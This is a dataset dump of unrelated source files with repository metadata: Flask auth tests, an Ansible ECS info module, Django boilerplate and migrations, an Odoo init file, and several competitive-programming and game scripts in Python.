10afc6582717758e6a1c4680f3330b5869a0a8ab | 8019f0df9a782b825132a328f1425fbe3028e657 | /odoo/addons/splashsync/models/__init__.py | 06a199a4ac86223a4739e58a11eaf9d1050c4bff | [] | no_license | p403n1x/odoo | 01b5e28eb1351c04d9045a1fb16e30de45c7929d | ce2cd03b3a9a8b5cfa5a81cf2b70ecafe5fb1ce2 | refs/heads/master | 2023-01-03T17:29:55.322847 | 2020-10-28T15:21:44 | 2020-10-28T15:21:44 | 280,176,919 | 0 | 1 | null | 2020-10-28T15:21:46 | 2020-07-16T14:33:56 | Python | UTF-8 | Python | false | false | 611 | py | # -*- coding: utf-8 -*-
#
# This file is part of SplashSync Project.
#
# Copyright (C) 2015-2019 Splash Sync <www.splashsync.com>
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
#
# For the full copyright and license information, please view the LICENSE
# file that was distributed with this source code.
#
from . import authentification
from . import configuration
from . import partner
from . import product
from . import product_template
from . import order
| [
"eshop.bpaquier@gmail.com"
] | eshop.bpaquier@gmail.com |
018c098be0eb7d6c35d84417bd949c4b65953d0a | 290fa984448c3350fa4059fa8852f8a1321109ab | /services/users/src/tests/test_auth.py | 7dd4fe5f2cebc3ad872c2a74d435400353e40d41 | [] | no_license | testdrivenio/flask-react-aws | 673a612ae3368e7a9dcd7ddb50c0ea03e3221928 | 365f0771d5234b0b4dfe05d59bab29a03845af4f | refs/heads/master | 2023-07-19T19:45:14.042103 | 2022-05-04T16:08:52 | 2022-05-04T16:08:52 | 198,724,692 | 29 | 21 | null | 2023-07-19T14:39:18 | 2019-07-24T23:54:07 | Python | UTF-8 | Python | false | false | 6,254 | py | import json
import pytest
from flask import current_app
def test_user_registration(test_app, test_database):
client = test_app.test_client()
resp = client.post(
"/auth/register",
data=json.dumps(
{
"username": "justatest",
"email": "test@test.com",
"password": "123456",
}
),
content_type="application/json",
)
data = json.loads(resp.data.decode())
assert resp.status_code == 201
assert resp.content_type == "application/json"
assert "justatest" in data["username"]
assert "test@test.com" in data["email"]
assert "password" not in data
def test_user_registration_duplicate_email(test_app, test_database, add_user):
add_user("test", "test@test.com", "test")
client = test_app.test_client()
resp = client.post(
"/auth/register",
data=json.dumps(
{"username": "michael", "email": "test@test.com", "password": "test"}
),
content_type="application/json",
)
data = json.loads(resp.data.decode())
assert resp.status_code == 400
assert resp.content_type == "application/json"
assert "Sorry. That email already exists." in data["message"]
@pytest.mark.parametrize(
"payload",
[
{},
{"email": "me@testdriven.io", "password": "greaterthanten"},
{"username": "michael", "password": "greaterthanten"},
{"email": "me@testdriven.io", "username": "michael"},
],
)
def test_user_registration_invalid_json(test_app, test_database, payload):
client = test_app.test_client()
resp = client.post(
"/auth/register",
data=json.dumps(payload),
content_type="application/json",
)
data = json.loads(resp.data.decode())
assert resp.status_code == 400
assert resp.content_type == "application/json"
assert "Input payload validation failed" in data["message"]
def test_registered_user_login(test_app, test_database, add_user):
add_user("test3", "test3@test.com", "test")
client = test_app.test_client()
resp = client.post(
"/auth/login",
data=json.dumps({"email": "test3@test.com", "password": "test"}),
content_type="application/json",
)
data = json.loads(resp.data.decode())
assert resp.status_code == 200
assert resp.content_type == "application/json"
assert data["access_token"]
assert data["refresh_token"]
def test_not_registered_user_login(test_app, test_database):
client = test_app.test_client()
resp = client.post(
"/auth/login",
data=json.dumps({"email": "testnotreal@test.com", "password": "test"}),
content_type="application/json",
)
data = json.loads(resp.data.decode())
assert resp.status_code == 404
assert resp.content_type == "application/json"
assert "User does not exist." in data["message"]
def test_valid_refresh(test_app, test_database, add_user):
add_user("test4", "test4@test.com", "test")
client = test_app.test_client()
# user login
resp_login = client.post(
"/auth/login",
data=json.dumps({"email": "test4@test.com", "password": "test"}),
content_type="application/json",
)
# valid refresh
refresh_token = json.loads(resp_login.data.decode())["refresh_token"]
resp = client.post(
"/auth/refresh",
data=json.dumps({"refresh_token": refresh_token}),
content_type="application/json",
)
data = json.loads(resp.data.decode())
assert resp.status_code == 200
assert resp.content_type == "application/json"
assert data["access_token"]
assert data["refresh_token"]
assert resp.content_type == "application/json"
def test_invalid_refresh_expired_token(test_app, test_database, add_user):
add_user("test5", "test5@test.com", "test")
current_app.config["REFRESH_TOKEN_EXPIRATION"] = -1
client = test_app.test_client()
# user login
resp_login = client.post(
"/auth/login",
data=json.dumps({"email": "test5@test.com", "password": "test"}),
content_type="application/json",
)
# invalid token refresh
refresh_token = json.loads(resp_login.data.decode())["refresh_token"]
resp = client.post(
"/auth/refresh",
data=json.dumps({"refresh_token": refresh_token}),
content_type="application/json",
)
data = json.loads(resp.data.decode())
assert resp.status_code == 401
assert resp.content_type == "application/json"
assert "Signature expired. Please log in again." in data["message"]
def test_invalid_refresh(test_app, test_database):
client = test_app.test_client()
resp = client.post(
"/auth/refresh",
data=json.dumps({"refresh_token": "Invalid"}),
content_type="application/json",
)
data = json.loads(resp.data.decode())
assert resp.status_code == 401
assert resp.content_type == "application/json"
assert "Invalid token. Please log in again." in data["message"]
def test_user_status(test_app, test_database, add_user):
add_user("test6", "test6@test.com", "test")
client = test_app.test_client()
resp_login = client.post(
"/auth/login",
data=json.dumps({"email": "test6@test.com", "password": "test"}),
content_type="application/json",
)
token = json.loads(resp_login.data.decode())["access_token"]
resp = client.get(
"/auth/status",
headers={"Authorization": f"Bearer {token}"},
content_type="application/json",
)
data = json.loads(resp.data.decode())
assert resp.status_code == 200
assert resp.content_type == "application/json"
assert "test6" in data["username"]
assert "test6@test.com" in data["email"]
assert "password" not in data
def test_invalid_status(test_app, test_database):
client = test_app.test_client()
resp = client.get(
"/auth/status",
headers={"Authorization": "Bearer invalid"},
content_type="application/json",
)
data = json.loads(resp.data.decode())
assert resp.status_code == 401
assert resp.content_type == "application/json"
assert "Invalid token. Please log in again." in data["message"]
| [
"hermanmu@gmail.com"
] | hermanmu@gmail.com |
259eaa9eb150b7462d4c925d4708645aab5782b6 | f4e9721bd529541f2402472f201bb6fde66fea53 | /Lonely monk.py | d4a8ed8aa1175027efeb694272814602d7db99a5 | [] | no_license | wimpywarlord/hacker_earth_and_hacker_rank_solutions | 23d973778bceca5a395dd98b0b7252db49d02366 | 1277ba97e2744a7dab62f1e1319aac77f8ec6a28 | refs/heads/master | 2021-07-01T19:48:07.501021 | 2019-12-28T05:55:39 | 2019-12-28T05:55:39 | 172,307,339 | 10 | 3 | null | 2020-10-01T06:43:03 | 2019-02-24T07:08:29 | Python | UTF-8 | Python | false | false | 478 | py | n=int(input())
x=input()
a=x.split()
for i in range(0,n):
a[i]=int(a[i])
print(a)
d=[]
for i in range(0,n):
counter=n
for j in range(i,n):
summ=0
for k in range(i,counter):
print(a[k],end=' ')
summ=summ+a[k]
counter-=1
print()
print(summ)
d.append(summ)
print()
print()
print(d)
gg=0
for i in range(0,len(d)):
if d[i]%2==0:
gg+=1
print(gg)
| [
"wimpywarlord@gmail.com"
] | wimpywarlord@gmail.com |
e3a9971a7c467b2a337cc7609361518a273549cb | dd8363acd9a028d9b6432936d72e7a5344077c20 | /plugins/modules/ecs_taskdefinition_info.py | 1ca9c29f56917c329488e57cc8ec275d3183b503 | [] | no_license | gundalow-collections/amazon | 5d437c41af5e3cfa73731c9cd2c08b66c7480b43 | 23c743b63f58ba97960479e230b462fb1c90cc95 | refs/heads/master | 2020-08-28T04:53:02.641829 | 2019-10-25T19:40:04 | 2019-10-25T19:40:04 | 217,595,855 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 12,417 | py | #!/usr/bin/python
# Copyright: Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''author:
- Gustavo Maia (@gurumaia)
- Mark Chance (@Java1Guy)
- Darek Kaczynski (@kaczynskid)
description:
- Describes a task definition in ecs.
extends_documentation_fragment:
- ansible.amazon.aws
- ansible.amazon.ec2
module: ecs_taskdefinition_info
notes:
- for details of the parameters and returns see U(http://boto3.readthedocs.io/en/latest/reference/services/ecs.html#ECS.Client.describe_task_definition)
- This module was called C(ecs_taskdefinition_facts) before Ansible 2.9. The usage
did not change.
options:
task_definition:
description:
- The name of the task definition to get details for
required: true
requirements:
- json
- botocore
- boto3
short_description: describe a task definition in ecs
version_added: '2.5'
'''
EXAMPLES = '''
# Note: These examples do not set authentication details, see the AWS Guide for details.
- ecs_taskdefinition_info:
task_definition: test-td
'''
RETURN = '''
container_definitions:
description: Returns a list of complex objects representing the containers
returned: success
type: complex
contains:
name:
description: The name of a container.
returned: always
type: str
image:
description: The image used to start a container.
returned: always
type: str
cpu:
description: The number of cpu units reserved for the container.
returned: always
type: int
memoryReservation:
description: The soft limit (in MiB) of memory to reserve for the container.
returned: when present
type: int
links:
description: Links to other containers.
returned: when present
type: str
portMappings:
description: The list of port mappings for the container.
returned: always
type: complex
contains:
containerPort:
description: The port number on the container.
returned: when present
type: int
hostPort:
description: The port number on the container instance to reserve for your container.
returned: when present
type: int
protocol:
description: The protocol used for the port mapping.
returned: when present
type: str
essential:
description: Whether this is an essential container or not.
returned: always
type: bool
entryPoint:
description: The entry point that is passed to the container.
returned: when present
type: str
command:
description: The command that is passed to the container.
returned: when present
type: str
environment:
description: The environment variables to pass to a container.
returned: always
type: complex
contains:
name:
description: The name of the environment variable.
returned: when present
type: str
value:
description: The value of the environment variable.
returned: when present
type: str
mountPoints:
description: The mount points for data volumes in your container.
returned: always
type: complex
contains:
sourceVolume:
description: The name of the volume to mount.
returned: when present
type: str
containerPath:
description: The path on the container to mount the host volume at.
returned: when present
type: str
readOnly:
description: If this value is true , the container has read-only access to the volume.
If this value is false , then the container can write to the volume.
returned: when present
type: bool
volumesFrom:
description: Data volumes to mount from another container.
returned: always
type: complex
contains:
sourceContainer:
description: The name of another container within the same task definition to mount volumes from.
returned: when present
type: str
readOnly:
description: If this value is true , the container has read-only access to the volume.
If this value is false , then the container can write to the volume.
returned: when present
type: bool
hostname:
description: The hostname to use for your container.
returned: when present
type: str
user:
description: The user name to use inside the container.
returned: when present
type: str
workingDirectory:
description: The working directory in which to run commands inside the container.
returned: when present
type: str
disableNetworking:
description: When this parameter is true, networking is disabled within the container.
returned: when present
type: bool
privileged:
description: When this parameter is true, the container is given elevated
privileges on the host container instance (similar to the root user).
returned: when present
type: bool
readonlyRootFilesystem:
description: When this parameter is true, the container is given read-only access to its root file system.
returned: when present
type: bool
dnsServers:
description: A list of DNS servers that are presented to the container.
returned: when present
type: str
dnsSearchDomains:
description: A list of DNS search domains that are presented to the container.
returned: when present
type: str
extraHosts:
description: A list of hostnames and IP address mappings to append to the /etc/hosts file on the container.
returned: when present
type: complex
contains:
hostname:
description: The hostname to use in the /etc/hosts entry.
returned: when present
type: str
ipAddress:
description: The IP address to use in the /etc/hosts entry.
returned: when present
type: str
dockerSecurityOptions:
description: A list of strings to provide custom labels for SELinux and AppArmor multi-level security systems.
returned: when present
type: str
dockerLabels:
description: A key/value map of labels to add to the container.
returned: when present
type: str
ulimits:
description: A list of ulimits to set in the container.
returned: when present
type: complex
contains:
name:
description: The type of the ulimit .
returned: when present
type: str
softLimit:
description: The soft limit for the ulimit type.
returned: when present
type: int
hardLimit:
description: The hard limit for the ulimit type.
returned: when present
type: int
logConfiguration:
description: The log configuration specification for the container.
returned: when present
type: str
options:
description: The configuration options to send to the log driver.
returned: when present
type: str
family:
description: The family of your task definition, used as the definition name
returned: always
type: str
task_definition_arn:
description: ARN of the task definition
returned: always
type: str
task_role_arn:
description: The ARN of the IAM role that containers in this task can assume
returned: when role is set
type: str
network_mode:
description: Network mode for the containers
returned: always
type: str
revision:
description: Revision number that was queried
returned: always
type: int
volumes:
description: The list of volumes in a task
returned: always
type: complex
contains:
name:
description: The name of the volume.
returned: when present
type: str
host:
description: The contents of the host parameter determine whether your data volume
persists on the host container instance and where it is stored.
returned: when present
type: bool
source_path:
description: The path on the host container instance that is presented to the container.
returned: when present
type: str
status:
description: The status of the task definition
returned: always
type: str
requires_attributes:
description: The container instance attributes required by your task
returned: when present
type: complex
contains:
name:
description: The name of the attribute.
returned: when present
type: str
value:
description: The value of the attribute.
returned: when present
type: str
targetType:
description: The type of the target with which to attach the attribute.
returned: when present
type: str
targetId:
description: The ID of the target.
returned: when present
type: str
placement_constraints:
description: A list of placement constraint objects to use for tasks
returned: always
type: complex
contains:
type:
description: The type of constraint.
returned: when present
type: str
expression:
description: A cluster query language expression to apply to the constraint.
returned: when present
type: str
'''
from ansible_collections.ansible.amazon.plugins.module_utils.aws.core import AnsibleAWSModule
from ansible_collections.ansible.amazon.plugins.module_utils.ec2 import camel_dict_to_snake_dict, boto3_conn, ec2_argument_spec, get_aws_connection_info
try:
import botocore
except ImportError:
pass # will be detected by imported AnsibleAWSModule
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(dict(
task_definition=dict(required=True, type='str')
))
module = AnsibleAWSModule(argument_spec=argument_spec, supports_check_mode=True)
if module._name == 'ecs_taskdefinition_facts':
module.deprecate("The 'ecs_taskdefinition_facts' module has been renamed to 'ecs_taskdefinition_info'", version='2.13')
region, ec2_url, aws_connect_kwargs = get_aws_connection_info(module, boto3=True)
ecs = boto3_conn(module, conn_type='client', resource='ecs',
region=region, endpoint=ec2_url, **aws_connect_kwargs)
try:
ecs_td = ecs.describe_task_definition(taskDefinition=module.params['task_definition'])['taskDefinition']
except botocore.exceptions.ClientError:
ecs_td = {}
module.exit_json(changed=False, **camel_dict_to_snake_dict(ecs_td))
if __name__ == '__main__':
main()
| [
"brian.coca+git@gmail.com"
] | brian.coca+git@gmail.com |
e550a7da4602d02bd9ec286325f5bf90fb73f176 | 5c3d487c1f48e33c507a8aca1c2fc178cf95e17f | /interview/leet/004_2lists_median.py | 90e07fac5e0013b8cd475c180434cbb20983d40b | [
"MIT"
] | permissive | eroicaleo/LearningPython | 52f9bcda796ea8fcc40a2971f30102d2847c93a4 | ebebd1104b1947324fbaae304b44465f80803c8b | refs/heads/master | 2023-07-20T04:34:51.465451 | 2023-07-13T06:43:31 | 2023-07-13T06:43:31 | 14,948,231 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,043 | py | #!/usr/bin/env python
def process_lists(l1, l2, k):
# k is a index in range(0, k)
l1_lo, l1_hi, l2_lo, l2_hi = 0, len(l1)-1, 0, len(l2)-1
while True:
# break condition 2, lo > hi
if l1_hi < l1_lo:
print('crossing l1_lo: %d, l1_hi: %d.' % (l1_lo, l1_hi))
return l2[l2_lo+k]
if l2_hi < l2_lo:
print('crossing l2_lo: %d, l2_hi: %d.' % (l2_lo, l2_hi))
return l1[l1_lo+k]
print('#' * 80)
print("Initial: l1_lo: %d, l1_hi: %d, l2_lo: %d, l2_hi: %d" % (l1_lo, l1_hi, l2_lo, l2_hi))
print('looking for No. %d element in %s and %s' % (k, l1[l1_lo:l1_hi+1], l2[l2_lo:l2_hi+1]))
# After these two steps, l1 and l2 are at most length k-1
# Index k more close to 0 or len(l1) + len(l2) ?
j = (l1_hi-l1_lo+1) + (l2_hi-l2_lo+1) - 1 - k
if k <= j:
l1_hi = min(l1_hi, l1_lo+k)
l2_hi = min(l2_hi, l2_lo+k)
else:
l1_lo = max(l1_lo, l1_hi-j)
l2_lo = max(l2_lo, l2_hi-j)
print("Reduce length: l1_lo: %d, l1_hi: %d, l2_lo: %d, l2_hi: %d" % (l1_lo, l1_hi, l2_lo, l2_hi))
print('looking for the element in %s and %s' % (l1[l1_lo:l1_hi+1], l2[l2_lo:l2_hi+1]))
# temination condition:
if k == 0:
print('k = %d' % k)
return min(l1[l1_lo], l2[l2_lo])
if j == 0:
print('j = %d' % j)
return max(l1[l1_hi], l2[l2_hi])
if k <= j:
# Remove k/2 element
move = int((k-1)/2)
l1_mi, l2_mi = [l + move for l in [l1_lo, l2_lo]]
# they cann't be bigger than l?_hi
l1_mi, l2_mi = min(l1_mi, l1_hi), min(l2_mi, l2_hi)
print("l1[l1_mi] : %d, l2[l2_mi] : %d" % (l1[l1_mi], l2[l2_mi]))
if l1[l1_mi] <= l2[l2_mi]:
real_move = min(l1_hi+1, l1_lo+move+1) - l1_lo
l1_lo += real_move
else:
real_move = min(l2_hi+1, l2_lo+move+1) - l2_lo
l2_lo += real_move
k -= real_move
else:
# Remove j/2 element
move = int((j-1)/2)
l1_mi, l2_mi = [l - move for l in [l1_hi, l2_hi]]
# they cann't be smaller than l?_lo
l1_mi, l2_mi = max(l1_mi, l1_lo), max(l2_mi, l2_lo)
print("l1[l1_mi] : %d, l2[l2_mi] : %d" % (l1[l1_mi], l2[l2_mi]))
if l1[l1_mi] >= l2[l2_mi]:
real_move = l1_hi - max(l1_lo-1, l1_hi-move-1)
l1_hi -= real_move
else:
real_move = l2_hi - max(l2_lo-1, l2_hi-move-1)
l2_hi -= real_move
k = (l1_hi-l1_lo+1) + (l2_hi-l2_lo+1) - 1 - (j-real_move)
print("Remove k/2 elements: l1_lo: %d, l1_hi: %d, l2_lo: %d, l2_hi: %d" % (l1_lo, l1_hi, l2_lo, l2_hi))
print('looking for No. %d element in %s and %s' % (k, l1[l1_lo:l1_hi+1], l2[l2_lo:l2_hi+1]))
# break condition 2, lo > hi
if l1_hi < l1_lo:
print('crossing l1_lo: %d, l1_hi: %d.' % (l1_lo, l1_hi))
return l2[l2_lo+k]
if l2_hi < l2_lo:
print('crossing l2_lo: %d, l2_hi: %d.' % (l2_lo, l2_hi))
return l1[l1_lo+k]
if __name__ == '__main__':
# l1 = [1, 2, 3]
# l2 = [4, 5, 6]
# for i in range(0, len(l1+l2)):
# print('## Iteration i = %d' % i)
# print(process_lists(l1, l2, i))
# l1 = list(range(1, 9, 2))
# l2 = list(range(2, 10, 2))
# for i in range(len(l1+l2)):
# print('## Iteration i = %d' % i)
# print(process_lists(l1, l2, i))
# l1 = [7]
# l2 = list(range(0, 7)) + list(range(8, 16))
# for i in range(len(l1+l2)):
# print('## Iteration i = %d' % i)
# print(process_lists(l1, l2, i))
l1 = [1]
l2 = [2, 3, 4, 5, 6, 7]
l = (len(l1) + len(l2)) // 2
print(process_lists(l1, l2, l))
l1 = [2,3,5,6,8,9]
l2 = [1,4,7]
l = (len(l1) + len(l2)) // 2
print(process_lists(l1, l2, l))
| [
"eroicaleo@gmail.com"
] | eroicaleo@gmail.com |
d947f066692c5b74bac324ac407eae75542cdea9 | b5b31b22604b069a1dbf96a1968675185834b4b2 | /backend/ireach_22272/wsgi.py | 2c6bd9068288e1621f2aae90cfbe6ff9257fdcba | [] | no_license | crowdbotics-apps/ireach-22272 | 1a1c140d61fecd088684c1fe2e9022e9227e1f09 | 5ed17eeefd1d25d0d31d98a98ba1309c295353e5 | refs/heads/master | 2023-01-09T20:15:26.480421 | 2020-11-03T21:21:15 | 2020-11-03T21:21:15 | 309,809,921 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 401 | py | """
WSGI config for ireach_22272 project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'ireach_22272.settings')
application = get_wsgi_application()
| [
"team@crowdbotics.com"
] | team@crowdbotics.com |
469482f8e69ff66760208ab38b9533fd5b051aad | 945c6df0d8c129b5ffc3c2bcbadbfe1d6e5608d5 | /Bela/bela.py | e99040a8892ec52d6350f752428ab6a589a365ba | [] | no_license | jb1361/kattis | a93236db5c8c2d5660bf9acc6385db61854f9ff6 | c5245124a18a465b4ea50b11228033fae1c65775 | refs/heads/master | 2018-11-29T23:40:22.853840 | 2018-09-05T15:39:33 | 2018-09-05T15:39:33 | 94,928,101 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 610 | py | dominant = [['A',11],['K',4],['Q',3],['J',20],['T',10],['9',14],['8',0],['7',0]]
notdominant = [['A',11],['K',4],['Q',3],['J',2],['T',10],['9',0],['8',0],['7',0]]
inp = input()
inp = inp.split()
hands = int(inp[0]) * 4
domHand = inp[1]
card_data = []
i = 0
while i < hands:
temp = input()
card_data.append(temp)
i += 1
points = 0
def calc_points(card, suit):
if suit == domHand:
tempp = 0
for i in dominant:
if i[0] == card:
return int(i[1])
else:
for i in notdominant:
if i[0] == card:
return int(i[1])
for i in card_data:
points += calc_points(i[0],i[1])
print(points) | [
"justinbutler4@hotmail.com"
] | justinbutler4@hotmail.com |
638b967383833a626bf654f60c58a3690a7a5a47 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02911/s816534461.py | 13c30ef108655a3fe436359c3a523f096f0a221c | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 178 | py | n, k, q = map(int, input().split())
a = [int(input()) for i in range(q)]
l = [k-q] * n
for i in a:
l[i-1] += 1
for f in l:
if f <= 0:
print("No")
else:
print("Yes") | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
078aac1497450963b1b2d31e8579a5c45914908d | 56b63ee537f872af0fc028016d1508b4c1dd5c60 | /school/migrations/0069_cloan_deposit.py | fe3ae552699145c8ebafd5e53de70ecfa7fb258e | [] | no_license | jacknjillsolutionsrevanth/EMS1 | 01fc571120f765b0fbfe3aa654b15ff578d6e9b9 | db14d8e6c15669b5938aa9276c5e22006218814a | refs/heads/main | 2023-08-03T19:40:50.073133 | 2021-10-01T07:02:37 | 2021-10-01T07:02:37 | 410,202,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,364 | py | # Generated by Django 3.1.2 on 2020-11-02 05:29
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('school', '0068_center_ifsc'),
]
operations = [
migrations.CreateModel(
name='Cloan',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('loan_type', models.CharField(blank=True, max_length=255, null=True)),
('date', models.DateField(blank=True, null=True)),
('transaction_type', models.CharField(blank=True, max_length=255, null=True)),
('center', models.CharField(blank=True, max_length=255, null=True)),
('loan_no', models.CharField(blank=True, max_length=255, null=True)),
('loan_date', models.DateField(blank=True, null=True)),
('principal_amt', models.IntegerField(blank=True, null=True)),
('interest_rate', models.FloatField(default=0.0)),
('flat_deminished', models.CharField(blank=True, max_length=255, null=True)),
('loan_duration', models.IntegerField(blank=True, null=True)),
('interest_amt', models.FloatField(default=0.0)),
('noofinstallments', models.IntegerField(blank=True, null=True)),
('installment_amt', models.IntegerField(blank=True, null=True)),
],
),
migrations.CreateModel(
name='Deposit',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date', models.DateField(blank=True, null=True)),
('issuedto', models.CharField(blank=True, max_length=255, null=True)),
('center', models.CharField(blank=True, max_length=255, null=True)),
('transporter', models.CharField(blank=True, max_length=255, null=True)),
('modeofreturn', models.CharField(blank=True, max_length=255, null=True)),
('amount', models.FloatField(default=0.0)),
('remarks', models.CharField(blank=True, max_length=255, null=True)),
('closingdate', models.CharField(blank=True, max_length=255, null=True)),
],
),
]
| [
"jacknjillsolutions.revanth@gmail.com"
] | jacknjillsolutions.revanth@gmail.com |
84d15772355558872edd5fbf0f1bde46367a3a78 | e35fd52fe4367320024a26f2ee357755b5d5f4bd | /leetcode/p0953 - Verifying an Alien Dictionary.py | ef9f41b49f256cc3e3d21bf400d9105f0bd05618 | [] | no_license | liseyko/CtCI | a451967b0a0ce108c491d30b81e88d20ad84d2cd | c27f19fac14b4acef8c631ad5569e1a5c29e9e1f | refs/heads/master | 2020-03-21T14:28:47.621481 | 2019-11-12T22:59:07 | 2019-11-12T22:59:07 | 138,658,372 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 744 | py | class Solution:
def isAlienSorted(self, words: List[str], order: str) -> bool:
order = {c: i for i, c in enumerate(order)}
for i in range(1, len(words)):
w1, w2 = words[i-1], words[i]
for i in range(max(len(w1), len(w2))):
if i == len(w1):
return True
if i == len(w2) or order[w1[i]] > order[w2[i]]:
return False
elif order[w1[i]] < order[w2[i]]:
break
return True
def isAlienSorted(self, words, order):
order = {c: i for i, c in enumerate(order)}
nwords = [[order[c] for c in w] for w in words]
return all(w1 <= w2 for w1, w2 in zip(nwords, nwords[1:]))
| [
"liseyko@gmail.com"
] | liseyko@gmail.com |
82ab39e1ff512816b925a6c5a98b421d60a96b99 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/429/usersdata/314/106483/submittedfiles/jogoDaVelha.py | 90530203e54e5e7d61182079f64593ac3dba01f6 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,835 | py | from jogoDaVelha_BIB import *
tabuleiro = [ [' ',' ',' '], [' ',' ',' '], [' ',' ',' '] ] #Tabuleiro vazio
grupo = 'H [Breendon, Gustavo, Roberto, Rafael]' #Nome dos integrantes do grupo
jogador = ['',''] #Nome do jogador e simbolo
computador = ['Computador',''] #Computador e simbolo
bemVindo(grupo)
while True:
tabuleiro = [ [' ',' ',' '], [' ',' ',' '], [' ',' ',' '] ]
jogador[0] = input('Qual o seu nome (ou apelido)? ')
jogador[1], computador[1] = solicitaSimboloDoHumano()
turno = sorteioPrimeiraJogada(jogador[0])
movimentos = 0
print('Vencedor do sorteio para início do jogo: {}' .format(turno))
while True :
if turno == computador[0] :
tabuleiro = jogadaComputador(tabuleiro, computador[1])
movimentos += 1
acabou = verificaVencedor(tabuleiro, computador, movimentos)
if acabou :
break
turno = jogador[0]
else :
while True :
jogada = input('Qual a sua jogada, {}? ' .format(jogador[0]))
jogadaValida = validaJogada(tabuleiro, jogada)
if not jogadaValida :
print('OPS!!! Essa jogada não está disponível. Tente novamente!')
else :
tabuleiro = jogadaHumana(tabuleiro, jogador[1], jogada)
movimentos += 1
acabou = verificaVencedor(tabuleiro, jogador, movimentos)
turno = computador[0]
break
if acabou :
break
continua = input('Deseja jogar novamente? ').upper()
if not continua=='S':
break
| [
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
5701ca5a24ad422a24d1e85ccc647845822be9d9 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03167/s908459155.py | 5f856077bed000e7aa3d84fcde080fe3df6829a2 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 472 | py | H, W = map(int, input().split())
a = []
for _ in range(H):
a.append(input())
dp = [[0]*W for _ in range(H)]
dp[0][0] = 1
for i in range(H):
for j in range(W):
if a[i][j] == '#':
continue
if i + 1 < H and a[i+1][j] == '.':
dp[i+1][j] += dp[i][j]
dp[i+1][j] %= 1e9 + 7
if j + 1 < W and a[i][j+1] == '.':
dp[i][j+1] += dp[i][j]
dp[i][j+1] %= 1e9 + 7
print(int(dp[-1][-1])) | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.